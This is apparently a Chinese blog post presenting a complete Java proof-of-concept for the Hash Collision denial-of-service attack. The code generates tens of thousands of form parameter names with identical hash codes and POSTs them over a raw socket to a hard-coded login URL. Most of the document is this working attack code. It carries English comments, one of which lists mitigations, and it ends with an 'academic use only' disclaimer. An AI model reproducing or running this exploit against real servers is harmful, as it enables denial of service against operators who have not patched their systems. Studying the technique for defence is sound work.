最近看Web安全,看到最近这篇文章:Hash Collision DoS 问题 。
原理很简单,利用现有语言服务器的hash code实现缺陷,构造大量hash code相等的字符串,做成post的参数,让服务器忙于创建和查询hash map,从而使服务器拒绝服务。详细描述可以看上面那篇文章。
我试着写了个攻击的例子代码:
import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.IOException;
import java.io.OutputStreamWriter;
import java.net.MalformedURLException;
import java.net.Socket;
import java.net.URL;
import java.util.ArrayList;
import java.util.List;
/**
 * Proof-of-concept for the "Hash Collision DoS" described in the post above.
 *
 * <p>Every string this class builds is a concatenation of the two pieces
 * {@code "Aa"} and {@code "BB"}, whose {@link String#hashCode()} values are
 * equal (65*31+97 and 66*31+66 are both 2112). Since Java's string hash is
 * {@code h(s + t) == h(s) * 31^len(t) + h(t)}, any two strings assembled from
 * the same number of these pieces collide as well. The strings are then sent
 * as form-parameter names ({@code name=x&...}), so a server that stores request
 * parameters in a hash table with a deterministic hash function ends up with a
 * single bucket chain holding thousands of entries.
 *
 * <p>Defensive context (not exercised by this code, noted for the reader): the
 * usual mitigations are bounding the number of parameters a request may carry
 * (servlet containers expose such a limit, e.g. Tomcat's
 * {@code maxParameterCount}), keyed/randomised string hashing, and, since
 * Java 8, {@code HashMap} converting long collision chains into balanced trees
 * (JEP 180), which removes the linear-time lookups this PoC depends on. A
 * single request carrying tens of thousands of distinct parameter names is
 * also an easy signal to alert on at the edge.
 */
public class HashCollisionDosAttack {
    // The only two building blocks that ever appear in a generated name. Their
    // equal hash codes are what makes every n-piece concatenation collide.
    private final String[] srcs= {"Aa", "BB"};

    /**
     * Builds every string that can be formed from {@code n} pieces of {@link #srcs}.
     *
     * @param n number of pieces per string; each result is {@code 2*n} chars long
     * @return {@code 2^n} distinct strings, all sharing one hash code
     */
    private List<String> getStrings(int n) {
        List<String> strlist = new ArrayList<String>();
        // 2^n: one string per bit pattern of an n-bit index.
        int round = (int) Math.pow(2, n);
        for (int i = 0; i < round; ++i) {
            strlist.add(getString(i, n));
        }
        return strlist;
    }

    /**
     * Encodes the low {@code n} bits of {@code index} as a string: each bit picks
     * one of the two pieces, most-significant bit first.
     *
     * @param index bit pattern selecting the pieces
     * @param n     number of pieces (bits) to use
     * @return the {@code 2*n}-character string for that pattern
     */
    private String getString(int index, int n) {
        String str = "";
        int[] bytes = getBytesOf(index, n);
        // String concatenation inside the loop, kept as in the original listing.
        for (int i = 0; i < bytes.length; ++i) {
            str += srcs[bytes[i]];
        }
        return str;
    }

    /**
     * Splits {@code index} into its low {@code n} bits. Despite the name the
     * array holds bits, not bytes: element {@code k} is bit {@code n-1-k} of
     * {@code index}, so the result reads most-significant bit first.
     *
     * @param index value to decompose
     * @param n     number of bits wanted
     * @return array of {@code n} values, each 0 or 1
     */
    private int[] getBytesOf(int index, int n) {
        int[] bytes = new int[n];
        for (int i = 0; i < n; ++i) {
            bytes[n - i - 1] = 1 & (index >> i);
        }
        return bytes;
    }

    /**
     * Sends {@code params} as the body of a hand-written HTTP/1.1 POST over a
     * plain socket. The response is never read (that block is commented out
     * below), so {@code br} is always {@code null} and its close branch is dead
     * code. Any exception is printed and otherwise swallowed.
     *
     * @param url    target; only host, port and path are used
     * @param params already-encoded form body
     */
    private void post(URL url, String params) {
        Socket socket = null;
        BufferedWriter bw = null;
        BufferedReader br= null;
        try {
            socket = new Socket(url.getHost(), url.getPort());
            bw = new BufferedWriter(new OutputStreamWriter(socket.getOutputStream()));
            bw.write("POST " + url.getPath() + " HTTP/1.1\r\n");
            bw.write("Host: " + url.getHost() + "\r\n");
            bw.write("Content-Type: application/x-www-form-urlencoded\r\n");
            // Counts chars rather than bytes; the two agree here because every
            // generated name consists only of ASCII ("Aa", "BB", "=x&").
            bw.write("Content-Length: " + params.length() + "\r\n");
            bw.write("Connection: Keep-Alive\r\n");
            bw.write("\r\n");
            bw.write(params);
            bw.flush();
            // Response handling was left disabled in the original listing.
            // br = new BufferedReader(new InputStreamReader(socket.getInputStream(),"UTF-8"));
            // String line;
            // while ((line = br.readLine()) != null) {
            // System.out.println(line);
            // }
            // System.out.println(params);
        } catch (Exception e) {
            e.printStackTrace();
        } finally {
            // Socket is closed before the writer that wraps its stream.
            if (null != socket) {
                try {
                    socket.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            if (null != bw) {
                try {
                    bw.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
            if (null != br) {
                try {
                    br.close();
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }
    }

    /**
     * Builds the parameter sets for piece counts {@code 1..n} and POSTs them all
     * in one request. The body holds {@code 2^(n+1) - 2} names in total (65534
     * for the {@code n = 15} used by {@link #main}); names of the same length
     * share one hash code, so the request carries {@code n} colliding groups.
     *
     * @param urlStr target URL
     * @param n      largest piece count to include
     * @throws MalformedURLException if {@code urlStr} cannot be parsed
     */
    public void attack(String urlStr, int n) throws MalformedURLException {
        String params = "";
        for (int i = 1; i <= n; ++i) {
            params += buildParams(getStrings(i));
        }
        URL url = new URL(urlStr);
        post(url, params);
    }

    /**
     * Renders each string as a {@code name=x&} form pair; the trailing
     * {@code &} is left in place.
     *
     * @param strings parameter names
     * @return the concatenated pairs
     */
    private String buildParams(List<String> strings) {
        String params = "";
        for (String str : strings) {
            params += str + "=x&";
            // Computes and discards a hash; has no effect on the result.
            params.hashCode();
        }
        return params;
    }

    /** Entry point: one request with {@code n = 15} against the hard-coded URL. */
    public static void main(String[] args) throws MalformedURLException {
        HashCollisionDosAttack attack = new HashCollisionDosAttack();
        attack.attack("http://frigile.com/login/login.htm", 15);
    }
}
仅作学术交流,请勿用于非法目的。